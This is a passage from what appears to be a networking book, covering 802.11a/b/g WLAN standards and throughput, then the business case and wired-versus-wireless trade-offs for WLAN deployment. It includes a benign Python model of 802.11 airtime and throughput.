throughput strategy. As the strength and quality of a signal diminishes, a WLAN will automatically gear
down to adjust to a lower throughput rate. The opposite is also true. As the signal's quality increases,
the data rate rises.
What we have alluded to is that the defined data rates for each standard actually represent a nominal
theoretical boundary. In a perfect scenario, these nominal maxima could be met. However, the reality is
that interference, internal radio signaling, antenna type, atmospheric conditions, noise, attenuation, and
other influences have a role in determining the real throughput. Actual usable throughput is generally
about half of the theoretical rates. For example, in an 802.11b network, the theoretical data rate of 11
Mbps is reduced to an actual usable rate of around 6 Mbps. The same effect of stated to actual data
rates applies to 802.11g and 802.11a.
No magic formula enables the actual throughput to be predetermined because the factors that influence
the real throughput are many and diverse.

Regulatory Requirements
As you have learned, the radio spectrum is at the heart of any wireless network. Because RF devices are
used in many critical day-to-day applications, they have become heavily regulated. Police, fire, and air
traffic control systems use RF in some form. The regulations are in place to ensure that communications
can coexist and occur in a deterministic and orderly fashion. For example, the police can be notified of a
bank robbery and airplanes can communicate consistently with air traffic control.
Regulations surrounding RF are managed by both national and regional bodies. Significant disparities can
exist between respective local regulations. Awareness of potential differences in RF regulations is the
first step to complying with them. The second step is knowing which regulatory bodies are relevant in
your specific case and where to consult upon them.
A sample of the most important regulatory bodies includes
U.S. Federal Communication Commission (FCC)
European Telecommunications Standards Institute (ETSI)
Industry Canada (IC)
China Wireless Telecommunication Standard group (CWTS)
Japan's Telecom Engineering Center (TELEC)

Note
Note that this list is far from exhaustive. Contact your local government to assist you in
identifying your appropriate regulatory bodies.

Each regulatory body defines the specific use or constraint on the use of ISM and UNII radio frequencies.
Local authorities define which parts of the spectrum are permitted for use, the power levels that can be
emitted by the radio, and allowances surrounding approved commercial and consumer use.
Vendors of WLAN devices almost always consider local regulations when developing products. However,
WLAN equipment that is compliant for one region does not implicitly translate into compliance for other
regions. As such, geographical portability of the WLAN devices is not guaranteed from a regulatory point
of view. When planning a WLAN deployment across multiple countries, ensure that the selected
equipment has been approved for each location.
Additional concerns related to RF are the open availability of the unlicensed bands and their potential
overuse. Because these frequency ranges are unlicensed, many devices can coexist and potentially
compound interference problems.

Different WLAN Standards


The IEEE 802.11 WLAN standard contains a number of subsets that can potentially lead to confusion.
Indeed, the 802.11 substandards have resulted in the creation of an alphabet soup. This section brings
order to this situation and expands upon some of the more subtle differences between the various WLAN
standards. The IEEE standards that are covered are 802.11b, 802.11g, and 802.11a.
Because the respective standards were developed and ratified at different points in time, WLAN
equipment manufacturers have also produced hybrid devices that are capable of spanning multiple
standards. These are the so-called dual-band devices.

802.11b
IEEE 802.11b is the most commonly known WLAN standard. At the time of writing of this book, 802.11b
WLANs enjoy the highest market adoption. The standard has three main characteristics:
DSSS is used for modulation.
The frequency range is 2.4 GHz.
The maximum data rate is 11 Mbps, although the actual throughput is 5 to 6 Mbps.
Because DSSS is a simpler technology to implement in silicon, as opposed to software, it greatly
accelerated the 802.11b technology's time to market. However, the simplicity of implementation comes
at the cost of efficiency. Early deployments of WLANs were small and primarily used as secondary means
for network connectivity. In such an environment, the maximum bandwidth of 11 Mbps was all that was
needed, and it served these networks well.
The four respective data rates that are employed by 802.11b are 1 Mbps, 2 Mbps, 5.5 Mbps, and 11
Mbps. The effective range goes from 0 to 100 meters. The relationship between nominal throughput and
transmission distance is illustrated in Figure 1-18.

Figure 1-18. 802.11b Range Versus Throughput

802.11g
IEEE 802.11g is a hybrid implementation of WLAN technology. The following are its key characteristics:
Both DSSS and OFDM are used for modulation in function of the desired data rate.
The frequency range is 2.4 GHz.
The maximum data rate is 54 Mbps.
The higher data rate and backward compatibility with 802.11b are making IEEE 802.11g the protocol of
choice to displace 802.11b. 802.11g operates in the 2.4-GHz frequency range and can employ DSSS,
thus facilitating backward compatibility with 802.11b in the lower throughput range. However, 802.11g
employs OFDM for data rates above 11 Mbps as opposed to DSSS for data rates of 11 Mbps and below. OFDM is
more efficient than DSSS but also more complex to implement, hence the later time to market and
higher initial pricing for 802.11g.

Note
The frequency band alone does not guarantee compatibility with 802.11b. Other components
such as the same modulation and multiplexing techniques are also required for compatibility.
For example, 802.11g makes use of DSSS when operating at speeds up to 11 Mbps and
switches to OFDM for higher data rates.

Every benefit has a consequence, and the same is true for the backward compatibility of 802.11g with
802.11b. A mixed environment results in lower effective data rates for 802.11g because 802.11b stations
cannot decode OFDM transmissions and therefore cannot tell when an 802.11g station is using the medium.
To keep them from transmitting on top of OFDM frames, 802.11g stations in a mixed cell switch on a
protection mechanism: each OFDM data frame is preceded by an RTS/CTS exchange or a CTS-to-self sent at
an 802.11b rate that every station can decode, and the cell reverts to the longer 802.11b slot time.
This extra airtime is why 802.11g stations effectively throttle down in the presence of 802.11b stations.
Just like 802.11b, 802.11g is limited by power output constraints, governed by local or regional
governments. However, the tighter timing of OFDM enables data rates of up to 54 Mbps in the same
frequency band and power level. The 12 respective data rates that are employed by 802.11g are 1
Mbps, 2 Mbps, 5.5 Mbps, 6 Mbps, 9 Mbps, 11 Mbps, 12 Mbps, 18 Mbps, 24 Mbps, 36 Mbps, 48 Mbps,
and 54 Mbps. The effective range goes from 0 to 100 meters. The relationship between nominal
throughput and transmission distance is illustrated in Figure 1-19.

Figure 1-19. 802.11g Range Versus Throughput
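The halving of throughput described under "Combating External Effects," the CSMA/CA overhead of DIFS, backoff, and acknowledgement described under "Access Technology," and the 802.11b/g protection penalty described above can all be seen in a simple airtime model. The following Python script is an added illustration, not code from the book: it times one DCF data/ACK exchange for a 1500-byte frame on 802.11b at 11 Mbps, on an 802.11g-only cell at 54 Mbps, and on 802.11g at 54 Mbps protected by a CTS-to-self in a mixed cell, and converts each to MAC-layer throughput. Slot, SIFS, preamble, and OFDM symbol timings are the IEEE 802.11b/g values; the ACK rates (2 Mbps for 802.11b, 24 Mbps for OFDM), the 11-Mbps CTS-to-self, the use of the mean backoff, and the absence of retries or competing stations are assumptions of this example.

```python
"""Simplified 802.11 DCF airtime model. Constructed example, not from the book.

Times one successful data/ACK exchange (DIFS, mean backoff, optional
protection, data frame, SIFS, ACK) and converts it to MAC-layer throughput.
Slot, SIFS, PLCP and OFDM symbol timings are the IEEE 802.11b/g values; the
ACK rates, the CTS-to-self rate, the use of the mean backoff and the absence
of retries or competing stations are assumptions of this example.
"""
import math

MAC_OVERHEAD_BYTES = 28   # 24-byte header + 4-byte FCS (no QoS, no encryption)
ACK_BYTES = 14
CTS_BYTES = 14
SIFS_US = 10

# OFDM data bits carried per 4 us symbol at each 802.11a/g rate
OFDM_BITS_PER_SYMBOL = {6: 24, 9: 36, 12: 48, 18: 72,
                        24: 96, 36: 144, 48: 192, 54: 216}


def dsss_frame_us(nbytes, rate_mbps, long_preamble=True):
    """Airtime of an 802.11b PPDU: PLCP preamble and header, then the payload bits."""
    plcp = 192.0 if long_preamble else 96.0
    return plcp + nbytes * 8 / rate_mbps


def ofdm_frame_us(nbytes, rate_mbps):
    """Airtime of an 802.11g OFDM PPDU in the 2.4 GHz band.

    16 us preamble + 4 us SIGNAL field, whole 4 us symbols carrying 16 SERVICE
    bits, the frame and 6 tail bits, plus the 6 us signal extension 802.11g adds.
    """
    bits = 16 + nbytes * 8 + 6
    symbols = math.ceil(bits / OFDM_BITS_PER_SYMBOL[rate_mbps])
    return 20.0 + 4.0 * symbols + 6.0


def exchange_us(mode, payload_bytes=1500):
    """Mean airtime of one successful DCF data/ACK exchange in microseconds.

    mode "b11":  802.11b at 11 Mbps, long preamble, ACK at 2 Mbps
    mode "g54":  802.11g-only cell at 54 Mbps, short slot, ACK at 24 Mbps
    mode "g54p": 802.11g at 54 Mbps in a mixed cell: long slot, CWmin 31, and a
                 CTS-to-self at 11 Mbps so that 802.11b stations defer
    """
    frame = payload_bytes + MAC_OVERHEAD_BYTES
    if mode == "b11":
        slot, cwmin = 20, 31
        data = dsss_frame_us(frame, 11)
        ack = dsss_frame_us(ACK_BYTES, 2)
        protection = 0.0
    elif mode == "g54":
        slot, cwmin = 9, 15
        data = ofdm_frame_us(frame, 54)
        ack = ofdm_frame_us(ACK_BYTES, 24)
        protection = 0.0
    elif mode == "g54p":
        slot, cwmin = 20, 31
        data = ofdm_frame_us(frame, 54)
        ack = ofdm_frame_us(ACK_BYTES, 24)
        protection = dsss_frame_us(CTS_BYTES, 11) + SIFS_US
    else:
        raise ValueError(f"unknown mode {mode!r}")
    difs = SIFS_US + 2 * slot
    backoff = cwmin / 2 * slot          # mean of a uniform draw from 0..CWmin
    return difs + backoff + protection + data + SIFS_US + ack


def throughput_mbps(mode, payload_bytes=1500):
    """MAC-layer goodput when one station sends frames of this size back to back."""
    return payload_bytes * 8 / exchange_us(mode, payload_bytes)


if __name__ == "__main__":
    for mode in ("b11", "g54", "g54p"):
        print(f"{mode:5s} {exchange_us(mode):7.1f} us per frame -> "
              f"{throughput_mbps(mode):5.1f} Mbps")
```

Run as written, the 802.11b figure comes out near 6.2 Mbps, the pure 802.11g figure near 30 Mbps, and the protected 802.11g figure near 14 Mbps: the CTS-to-self and the longer slot time cost more airtime than the faster data rate saves. Smaller frames make every case worse, because the fixed per-frame overhead stays the same while the payload shrinks.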

802.11a
Contrary to common belief, the IEEE 802.11a standard is not new to the WLAN space, having been ratified
in 1999. The three key characteristics of 802.11a are as follows:
OFDM is used for modulation.
The frequency band is 5 GHz.
The maximum data rate is 54 Mbps.

Another important aspect of 802.11a is that it has eight non-overlapping channels to transmit on, as
opposed to the three in 802.11b/g. This higher number of transmit channels allows for more active
sessions. Indeed, the increased number of channels allows more stations to transmit in a given space.
This is basically equivalent to adding lanes to a highway. The relationship between nominal throughput
and transmission distance for 802.11a is illustrated in Figure 1-20.

Figure 1-20. 802.11a Range Versus Throughput

The drawback to working in the 5-GHz range is that the radios are more sensitive to environmental
conditions. 802.11a has had initial barriers to overcome, namely with price and performance, which
probably explain the lower adoption rates. Finally, when you consider that the new 802.11g standard
offers comparable speeds and has the significant added benefit of backwards compatibility with 802.11b,
it is not surprising that 802.11a faces this higher barrier to entry.
Table 1-2 provides a brief summary of the key differences between 802.11a, 802.11b, and 802.11g.

Table 1-2. WLAN Standards

IEEE Name   Frequency   Modulation Type   Native Bandwidth   Additional Speeds Supported (Mbps)
802.11a     5 GHz       OFDM              54 Mbps            48, 36, 24, 18, 12, 9, 6
802.11b     2.4 GHz     DSSS              11 Mbps            5.5, 2, 1
802.11g     2.4 GHz     DSSS and OFDM     54 Mbps            48, 36, 24, 18, 12, 11, 9, 6, 5.5, 2, 1

Coexistence
802.11a uses a completely different frequency range from 802.11b and 802.11g. If you install 802.11a
APs, you must ensure that you have 802.11a clients. In most cases, both infrastructure providers and
client radio manufacturers build multiradio products.
Both 802.11a and 802.11h use the 5-GHz range and are designed to coexist. 802.11h complements
802.11a with dynamic frequency selection (DFS) and transmit power control (TPC), so that stations in this
band can avoid radar systems and stay within European power limits. An 802.11h-capable network is therefore
an 802.11a network with these additions, and it carries 802.11a traffic without performance or quality
issues. Where the local regulator does not mandate DFS and TPC, a plain 802.11a network does not need
802.11h.

Note
802.11h is an IEEE standard that addresses certain power and channel issues that exist in
Europe.

Additional 802.11 Standards


You have examined the three WLAN standards that define WLANs. However, as the requirements for
interoperability, support for regional regulatory requirements, improved security, and other
enhancements have evolved, the original IEEE 802.11 working groups have been extended. Many new
standards have been defined or are currently under development. This is the cause of much additional
confusion. Not only do you need to be familiar with the three WLAN standards (802.11b, 802.11a, and
802.11g), but you also need to deal with an additional raft of new standards. Indeed, more letters have
been added to the alphabet soup.
It is important to note that the 802.11 standards are constantly evolving. Because the IEEE works
through discussion and democratic voting, the process of ratifying a new standard can be lengthy. Many
of the current 802.11 standards are therefore still under development. However, this does not stop
eager manufacturers from sometimes releasing products that are in a "preratification" state as an
attempt to beat their competitors to market. 802.11g is a prime example. Many 802.11g products were
released before the standard was put to vote. For the most part, manufacturers will develop their
products with the intention of embracing the ratified standard later on. Nevertheless, there are those
who will use their current product as a stepping stone for the next standard. We go into further detail in
Appendix A, "Wireless LAN Standards Reference."

Note
As part of the ratification process, no one company or individual is allowed to have an
advantage over another. This becomes an additional sticking point and sometimes further bogs
down the process.

Summary
This chapter introduced the value of mobility in today's information-driven society. The desire for access
to information anywhere and anytime has been and will continue to be a key driver for wireless
communications technologies in both the business and personal arena. This chapter provided a
structured approach to understanding WLANs from a technological point of view by introducing the OSI
framework. The framework not only helps you understand how WLANs position themselves next to other
internetworking technologies, but also aids the introduction of key technical aspects that are specific to
WLANs. Key components such as multiaccess, multiplex, duplex, and access technologies were touched
upon. In addition, the impact of internal and environmental effects such as power, attenuation,
distortion, and noise on actual WLAN throughputs was discussed. Finally, this chapter untangled the
IEEE 802.11 alphabet soup by providing a high-level overview of the main substandards and their
respective differences.

Endnotes
1. Negroponte, Nicholas. Being Digital. Vintage Press, 1995.
2. Christensen, Clayton M. The Innovator's Dilemma. HarperBusiness, 2000.

Chapter 2. Business Considerations

The 1990s were characterized by an IT investment frenzy. Everybody wanted to jump onto the Internet
bandwagon. Little effort was expended on analyzing and justifying the IT investment requirements and
benefits.
The bursting of the Internet bubble not only resulted in a myriad of failed businesses and large monetary
losses but also led to a renewed emphasis on scrutiny and accountability when making investments in
IT. Indeed, in many organizations, today's IT investments are not made at the discretion of the CIO or
CTO. The CFO is a key participant in the decision-making process for allocating the organization's funds
to IT. As a result, the need for a clear, concise, and robust IT business case has become imperative.
A term that is often used interchangeably or in conjunction with business case is return on investment
(ROI). However, these two terms do not necessarily denote the same thing. In fact, ROI is only a subset
of a business case and focuses exclusively on the financial ramifications of an investment.
ROI is often erroneously considered to be the silver-bullet metric that will ensure that the IT purchase
will be beneficial to the organization. As you will see in this chapter, ROI has benefits and pitfalls. An ROI
analysis is something senior management understands, and it instills rationality and standardization in
the IT decision-making process. However, because the strategic impact of IT investments is next to
impossible to quantify, ROI does not provide a vehicle for capturing these benefits. Furthermore,
elements such as the risk associated with the investment and the time value of money are not accounted
for by plain-vanilla ROI analysis. The specific benefits and pitfalls of ROI will be covered in greater detail
later in this chapter.
The goal of a business case, for WLANs or for other assets, is to provide a holistic cost justification. This
chapter demystifies the process of developing an exhaustive and rigorous business case for WLANs in
your organization. It also provides frameworks for tackling the challenge of business-technology
alignment and identification of opportune application points for WLANs within the organizational
ecosystem. Quantitative, qualitative, and risk considerations are covered to provide an exhaustive view.
Finally, given the importance of economic returns, the most common financial barometers including ROI,
payback period, Net Present Value, and internal rate of return are described in detail.

Aligning Technology Solutions with Business Considerations
Even though wireless networks form a very specific subset of information technology assets, several
high-level considerations are required before making the decision to pursue a concrete design and
implementation of a WLAN in your ecosystem. These considerations encompass both business and
technology considerations, and they are not necessarily unique to WLANs. Indeed, whenever an
investment opportunity or requirement is present, similar deliberations must be made. Examples include
what the rationale for the investment is, what the scope is, how much capital outlay will be required,
what the timing of these outlays is, what kinds of returns should be expected, and so on. The same
considerations can be made whether you are making an investment in information technology,
manufacturing equipment, real estate, or bonds.
There are, however, subtle differences when it comes to information technology infrastructure
investments for two reasons:
IT infrastructure is typically a sunk cost.
IT infrastructure is an enabler of higher-order solutions.
First, after IT infrastructure investments are made, they should be considered sunk costs, which cannot
be recovered. This is because the average shelf life of today's IT assets is relatively short, even though
the asset might be usable for a relatively long time. The key point to consider is the economic value, not
the life span of usability of the asset. Many IT products have economic life spans of one to three years,
after which they have no residual economic value. The lack of residual value does not, however, imply
that the asset can no longer be used.
Consider a similar example of a car. The fair market value of an automobile that is 7 to 10 years old is
almost non-existent. Nonetheless, assuming that the vehicle remains in good operating condition, the
car can continue to be driven until it physically breaks down. As such, the cost of the car is sunk after it
has reached a certain age, but this does not mean that it is no longer usable.
Now consider a real-estate investment such as a building or land. These costs are not considered sunk
because the initial cost can be recovered many years after the purchase has occurred. The residual value
of these assets remains relatively constant; in fact, we often hope that these assets appreciate.
A second difference relating to investments in IT infrastructure is that by design, infrastructure forms the
foundation upon which many higher-order solutions rest, including applications such as Customer
Relationship Management (CRM), Enterprise Resource Planning (ERP), and e-mail applications. The
applications support business processes that in turn help an organization to achieve its primary goals. IT
infrastructure thus not only becomes a core business enabler, but is often considered a core business
necessity in today's information-driven world.
The organizational ecosystem can thus be deconstructed into several distinct but tightly coupled
layers, as shown in Figure 2-1. At the very bottom, the infrastructure assets enable data transformation,
storage, and transport. These infrastructure assets are used by applications such as e-mail, web
services, CRM, ERP, and many others that give the information meaning.

Figure 2-1. The Organizational Ecosystem

In their turn, the applications support various transactional, analytical, and collaborative processes.
Transactional processes ensure that one activity in a sequence is committed before proceeding to the
next one. Analytical processes create, mine, and destroy data. Collaborative processes make it possible
to share information. Note that it is the collaborative process that actually creates real value because
information in isolation has none. What is the value of a book that nobody reads? What is the value of an
idea if nobody is aware of it?
At the very top, the organization has its specialized, dedicated teams that use the various processes to
help the organization achieve its goals. Examples of corporate goals are increasing shareholder value,
serving customers, providing employees with a superior working environment, and helping the
community.
The flow of information in the institutional ecosystem creates a dynamic, fluid environment through
which information flows with varying velocities. The ultimate purpose of acquiring, interpreting, and
manipulating this information is to enable the institution to act upon it and adjust to changing conditions
in the pursuit of its goals. For this to happen in a timely and relevant fashion, several criteria need to be
fulfilled:
You must understand the external environment in which the organization exists.
You must be thoughtful of the internal constituents that make up the organization.
You must align internal and external elements so that you can identify and manipulate the relevant
levers to effectively respond to the external environment.
Today, WLANs form an integral part of the IT infrastructure portfolio. However, it is not always clear
whether this transport asset is relevant for any given organization. Indeed, when considering WLANs,
you need to answer four basic questions:
Why are WLANs relevant to support my organizational goals?
What benefits should I target or expect?
Where should I deploy the WLANs?
How should I implement and operate the WLANs?
The remainder of this chapter covers the business-technology alignment challenge and arms you with
the necessary tools to tackle and answer the first two questions. The following chapters cover the third
and fourth questions.

Economic Considerations
In general, organizations exist to create value. The value creation process can take on many different
forms, including the production of goods and materials in the manufacturing industry, the care of
patients in the healthcare industry, the safekeeping and growth of financial assets in the financial
services industry, and the sharing of knowledge in the academic world. The value can be tangible, as in
the production of an automobile, or intangible, as when sharing knowledge.
To be effective at value creation, organizations must invest in tools that directly (or indirectly) support
the value creation process. IT infrastructure assets are such tools. At a high level, investments in IT
infrastructure assets are made to provide the organization with enabling tools to increase productivity
and flexibility. Increasing productivity can be thought of as extending the leverage of other assets such
as property, plants, equipment and human, intellectual, and brand capital. Greater flexibility implies a
better ability to sense and respond to internal and external changes that directly affect the organization.
In the context of WLANs, the key question that you need to answer is this: "How can WLANs aid my
organization in the value-creation process?"
To effectively and successfully answer this question, implement the following top-down approach:
Step 1. Understand your organizational ecosystem.
Step 2. Define the problem that you are trying to solve.
Step 3. Break the problem down.
Step 4. Define the WLAN-enabled solution.

Figure 2-2 illustrates the discrete steps that need to be taken. The next sections describe each step in
detail.

Figure 2-2. Determining the Economic Value of Your WLAN

Step 1: Understand Your Organizational Ecosystem

Every organization is subject to forces of change. These forces can come from inside the
organization (internal drivers) or from outside the organization (external forces). The combination of the
organization, the external constituents that are directly related to your organization, and the internal and
external forces makes up the ecosystem in which your organization operates.
Strategy consultants employ a variety of frameworks to structure and facilitate the comprehension of the
organizational ecosystem. Example frameworks include the three Cs (Customer, Company,
Competition), low-cost versus niche player, and internal-external factors.
When an understanding of internal factors and external considerations has been developed, you are
ready to tackle the following step.

Step 2: Define the Problem That You Are Trying to Solve


Given the dynamics of your specific organization, what value do you expect the WLANs to deliver? Note
that this question does not necessarily constrain itself to trivial answers such as "Enhancing
communications and connectivity." Indeed, armed with the knowledge acquired in the first step, your
answer can be made not only much more relevant for your organization but also much more specific.
Two examples clearly illustrate this point. In the summer of 2001, Starbucks Corporation, a company
known for serving coffee through its worldwide retail outlets, commenced deploying WLANs in its retail
outlets. One could argue that the value proposition for installing WLANs in the retail outlets was to make the
baristas more productive.
Starbucks' management, however, identified the value of providing WLAN-enabled Internet access to its customers
in another domain. By providing customers with easy-to-use Internet access, Starbucks hopes to
enhance and extend the customer's experience with the ultimate goal of serving him or her more coffee.
As such, the value proposition of WLANs to Starbucks becomes increased revenues through more
satisfying (repeat business) and longer (more servings) customer visits. The problem that Starbucks
Corporation solved with WLANs is this: "How can Starbucks enhance the experience of customers to
increase repeat business and make them consume more Starbucks' products?"
A second example is that of Lifespan, which is featured in Chapter 10, "Healthcare Case Study." Wireless
networks formed an integral part of Lifespan's IT infrastructure strategy as early as 1997. The challenge
that Lifespan tackled was providing timely information access throughout the healthcare continuum.
The nature of healthcare is such that physicians and nurses cannot be tethered. They must be able to do
rounds, go to clinics, and visit libraries. A challenge arises in that hospital staff must be able to access
applications for patient information while remaining mobile. As such, the goal becomes finding a solution
to get applications closer to the mobile physicians and the point of care of the patient.
The problem that Lifespan solved with WLANs is this: "How can Lifespan provide its physicians and
nurses with relevant and timely information at the point of care of patients to increase customer
satisfaction through delivery of safer, higher-quality healthcare?" Chapter 10 is dedicated to a case study
of WLANs in the healthcare environment and specifically covers the rationale that Lifespan developed for
deploying WLANs.
After you accurately define the problem, the next step is to break the complex problem down into
simpler, more manageable components.

Step 3: Break the Problem Down


As you learned in the second step, organizations primarily address two different types of problems with
WLANs:
Increasing revenues, as was the case for Starbucks
Increasing productivity and accuracy of staff, as was the case for Lifespan

You could argue that productivity and revenues are directly related and, hence, imply the same goal.
The goal might be the same. After all, the majority of organizations strive to increase profitability by
increasing revenue and decreasing expenses. The methods for achieving the goal, however, can be very
different. This becomes clear when you deconstruct the problem to more specifically identify how your
organization benefits from WLANs. Breaking down the problem not only makes the identification of a
specific value-proposition easier, but it also reduces the risk of oversight.
Four different dimensions are relevant when evaluating business challenges: strategic, operational,
financial, and technological. Keep in mind that the WLAN's value-proposition that you are attempting to
pinpoint is not necessarily limited to a single dimension. Indeed, it will typically span at least two
(strategic and technological) of them. A sample of drivers for WLANs in each of the four dimensions
follows.
Strategic drivers include the following:
Provide high-speed mobile access/availability to information.
Increase employee productivity.
Facilitate and enhance collaboration.
Improve response times to stakeholders (customers, coworkers, and suppliers).
Provide richer communications capabilities.
Enhance customer experience.
Increase customer satisfaction.
Increase customer loyalty.
Improve aesthetics (no dangling wires).
Operational drivers include the following:
Simplify management of network infrastructure.
Provide connectivity in temporary locations.
Avoid difficult cabling situations.
Provide scalable connectivity (avoid insufficient data ports).
Financial drivers include the following:
Obviate cabling costs.
Avoid circuit expenses (WLAN inter-building bridges).
Reduce equipment cost for sporadically used spaces (meeting rooms and common areas).
Technological drivers include the following:
Provide communications infrastructure for mobile devices.
Enable mobility for wireless applications.
Interconnect heterogeneous platforms, devices, and applications.
Figure 2-3 illustrates the four dimensions you need to consider when assessing the value proposition of a
WLAN.

Figure 2-3. Identifying the Value Proposition of Your WLAN

Step 4: Define WLAN-Enabled Solution


After you define and understand the problem to be solved, a WLAN solution can be constructed. Chapter
3, "Preparation and Planning," provides you with a structured approach for doing this. However, prior to
launching this phase, you need to understand what the role of WLANs is in your organization as well as
how to demonstrate the business value to your stakeholders. This is covered next.

The Role of Infrastructure


As mentioned earlier in this chapter, the environment in which a company or institution operates can be
broken down into interdependent blocks to create a layered model not so different from the OSI model.
Each building block can subsequently be broken down into discrete components to further deconstruct
and model the corporate and IT ecosystem.
At the infrastructure layer, a simplified distinction can be made between three different classes of IT
assets:
Compute assets: These assets manipulate and transform information. Servers and personal
computers (PCs) fall within the compute asset class.
Storage assets: Storage assets exist to collect and warehouse information. Disk arrays, CDs,
DVDs, and tape libraries are all examples of storage assets.
Transport assets: Transport assets ensure that information can be moved from its point of
origin or safekeeping to a point of consumption. Different kinds of communications networks such
as the Public Switched Telephone Network (PSTN), WANs, and LANs, and the technologies of choice for
their implementation such as routers, switches, hubs, and firewalls, are all examples of transport
assets.
Figure 2-4 illustrates the different asset classes of the IT infrastructure layer.

Figure 2-4. IT Infrastructure Assets

These asset classes exist regardless of the syntax or semantics of the data; that is, the classes are
independent of how the information is represented and what its meaning is. Also note that the classes
do not necessarily imply an electronic nature. Indeed, customer data on a paper document can be
transformed by a pencil, stored in a filing cabinet, and transported through the postal service. For the
purpose of this book, however, we shall ignore analog representations and focus solely on the digital
world.
Although the economic value of the information can vary widely (a meeting invitation e-mail is probably
much less valuable than a product order or annual budgeting data), its core utility is constant. Information
enables companies to sense and respond to changing business environments, thus facilitating the
creation and sustenance of a competitive advantage. Similarly, information allows healthcare institutions
to provide relevant, accurate, and timely care to patients. Finally, information in educational institutions
arms the next-generation work force with the tools necessary to support the economy and drive
continued growth through ongoing innovation.
Given the importance of information, it is critical to design an infrastructure that effectively, efficiently,
and securely supports the transactional, analytical, and collaborative use of data. As such, the challenge
at hand is one of aligning technology solutions (more specifically, the IT infrastructure portfolio) with
business requirements.

Pros and Cons of the Wired Versus Wireless World


WLANs can be considered a specific subset of the IT transport assets. This type of asset is dedicated to
and specialized in the transfer of information from a point of origin to a point of consumption or storage.
Note, however, that this transport asset class contains many different communications network
solutions. Examples include the GSM or CDMA networks used for cellular communications; data
networking solutions such as WLAN, Ethernet, and SNA for local-area networks; and Frame Relay, ATM,
and SONET for wide-area networks.
Chapter 1, "Introduction to Wireless LAN Technologies," introduced the OSI reference model and
employed the lower two layers (physical and data link) to provide a means of distinction and
classification between the various types of networks. This section focuses on the subset that is relevant
to WLANs, that is, local-area networks.
WLANs employ the unshielded, unbounded carrier mechanism of radio waves, as opposed to the
unshielded or shielded but bound transport channel of wired networks. Indeed, wired networks use
either electrical or photonic signals that are tunneled through a bearer medium. This unbounded versus
bounded nature is the key difference between wireless and wired LANs. The organizational pros and cons
related to this difference are discussed next.

Mobility: Pro
The unbounded nature of WLANs makes them pervasive within the coverage area. As such, you are not
forced to locate and remain tethered to a network outlet. Your three-dimensional roaming domain is
equal to the WLAN coverage area. In the wired world, your roaming ability is restricted by the tether. It
is equal to the volume of the sphere with a radius equal to the length of the cable that connects your
NIC to the network drop. That is the very best-case scenario. In practice, physical obstacles such as
furniture, doors, and walls will make this reach much smaller.
Contrary to the wired world, the connectivity footprint in the wireless world is not limited to the network
outlet. It is equal to the reach of the radio cloud, or more specifically, to the reach of your Basic Service
Set (BSS). This untethered character makes WLANs ideal for environments that require fluid,
transparent movement of computing assets. The value of mobility thus translates into convenience and
reduced downtime, which in turn can translate into increased productivity. Figure 2-5 illustrates the
difference in physical reach and mobility between wireless and wired networks.

Figure 2-5. Wireless and Wired Connectivity Footprints

Mobility is a key benefit in many different environments as it enables individuals to do their work when
and where it is convenient for them, thus directly boosting productivity.
In the knowledge-worker corporate world, the ability to swiftly pick up and move between locations
while retaining access to information reduces employee downtime and facilitates collaboration. Note that
this concept is not bound to the confines of the corporate offices. WLAN hotspots in airport lounges,
coffee shops, hotels, and airplanes enable road warriors to obtain network access at their
convenience throughout the business day. By supplementing WLANs with wide-area wireless cellular
networks, the business traveler will soon be able to remain connected continuously throughout his or her
journeys. Figure 2-6 and Figure 2-7 illustrate the evolution of connectivity options at various stages of a
typical business trip.

Figure 2-6. Today's Mobile Connectivity Options

Figure 2-7. Tomorrow's Mobile Connectivity Options

Another example is the world of education. Students are highly mobile. They move between dorm
rooms, classrooms, study rooms, and libraries. Because many of today's students are armed with
laptops, the value of mobility of the computing asset is vastly increased by complementing it with a
transparent, flexible and mobile communications solution. Note that the same is true for teaching staff
who roam between their offices, classrooms, and meeting rooms. The ability to remain connected
anytime and anywhere vastly increases the ease of use, and hence the productivity, of mobile computing
devices.
The hospital environment requires that physicians and nurses have patient information available at the
point of care. By bringing the computing environment to the mobile users, the probability that the
healthcare professionals will use the IT tools provided greatly increases. As such, the quality and safety
of healthcare is increased through accelerated access to and recording of patient information at the point
of care. Refer to Chapter 10 for a case study of WLANs in the healthcare environment.

Convenience: Pro
The source of convenience for WLANs can be found in the shared nature of the communications medium.
Indeed, contrary to the fan-out ratio of one user per wired LAN endpoint, the fan-out ratio for access
points of WLANs is theoretically unlimited. Many different users can associate with the same access point
without running into the situation of insufficient data ports.

Note
The fan-out ratio is the ratio of available network connections to users of the connections.

In practice, there is an acceptable access point fan-out ratio of approximately 30:1. This is a direct result
of the MAC mechanism. When too many stations are attached to the same AP, increasing contention for
network access will yield a deadlock situation in which no station can successfully send or receive either
because of the inability to obtain airspace access or because of frame collisions.
The upper limit of fan-out aside, WLANs provide a very flexible solution for providing a high number of
mobile devices with network access. This is ideal in situations where many different individuals (or
devices) require network connectivity. Examples include meeting rooms, classrooms, and public
hotspots such as airport lounges and coffee shops.
In addition, by using WLANs, you avoid the aesthetic wiring nightmare of using ad-hoc hubs or switches
to increase the fan-out of wired solutions. Finally, you avert the risk of encountering the situation in
which you do have a free data port, but you have no cable to plug into it.

Bandwidth: Con
WLANs do not offer the same bandwidth that is available in wired networks. Although you encounter port
speeds of up to 10 Gbps in today's wired LANs, WLANs are currently limited to 54 Mbps. The reasons are
mainly related to the physical characteristics of the bearer medium (that is, radio instead of electrical or
photonic) and the fact that WLANs are typically used in a shared operating mode. As such, it is critical to
consider the bandwidth and quality of service (QoS) implications when evaluating WLANs. First, available
WLAN bandwidth is orders of magnitude less than what is available with wired networks. Second, WLAN
bandwidth is shared among wireless stations. Real available throughput thus becomes a fraction of the
WLAN's nominal throughput. Finally, because WLANs are a best-effort transport solution, additional
considerations are required to provide some form of QoS determinism for latency-sensitive applications.
When a device is directly connected to a switch port, the communication medium is dedicated to that
device. This dedicated connectivity is only achieved in the WLAN environment if a single device is
associated with an AP. As such, bandwidth consideration should always be made with the shared nature
in mind.

Note
Strictly speaking, in 802.11, even when the AP has a single client, the AP and the client share
the same medium when communicating with one another. In Ethernet, separate wires enable
simultaneous bidirectional or full-duplex communication.

Note that the size of the pipe is not the only important parameter. Determining the amount of time
required to get access to the transport medium and the probability for successful transmission (that is,
no collisions) are also of key importance. The MAC characteristics of WLANs are such that no guarantees
are made in terms of timely delivery.
As such, additional intelligence is required to provide the relatively predictable network throughput,
latency, and jitter that is required by real-time and interactive data flows. QoS refers to the ability of a
